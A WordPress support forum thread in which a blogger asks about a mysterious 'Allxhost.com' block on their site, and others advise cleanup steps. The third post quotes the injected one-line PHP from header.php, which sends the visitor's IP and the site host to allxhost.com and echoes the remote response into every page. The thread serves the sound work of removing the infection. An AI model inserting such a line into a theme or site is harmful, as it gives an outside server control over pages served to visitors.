"Header" Virus? (6 posts)

  1. the2slayers
    Posted 5 years ago #

    I created this blog a few months ago. A few days ago I made my first post and then a few days later this "Allxhost.com" block showed up at the top of my page.

    I cannot seem to get rid of it no matter what I do. I, unfortunately, had to uninstall everything including plugins, themes, etc. It didn't seem to to fix the problem. This block was not coded into my scripts. And it seems that I can't find the code in the sheets they come from, only when I click "View Source."

    Any ideas?


  2. scribu
    Posted 5 years ago #

    Try checking your computer for viruses etc.

    Then try changing the password of your FTP account.

    Then delete ALL files and reinstall WP.

  3. truerunning
    Posted 5 years ago #

    Go to your current theme folder in unix or ftp and edit the header.php file. Remove the virus code, it's only one line.

    <body><?php $i = $_SERVER['REMOTE_ADDR']; $s = $_SERVER['HTTP_HOST']; echo @file_get_contents("http://allxhost.com/o.php?i=".$i."&=s".$s); ?>

    I was able to remove it from my site, but will also have to check my computer for viruses etc...

    [signature moderated Please read the Forum Rules]

  4. mrmist
    Forum Janitor
    Posted 5 years ago #

  5. markosibarra
    Posted 5 years ago #

    Any follow-ups to this problem?

    Because i thought i solved it once, but it was on my local installation.

    This time it's the server installation, and I think it might come back.

    Any chance that will happen again?

  6. You've responded to a seven month-old thread, but repairing a hack hasn't changed much. See How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress

Topic Closed

This topic has been closed to new replies.

About this Topic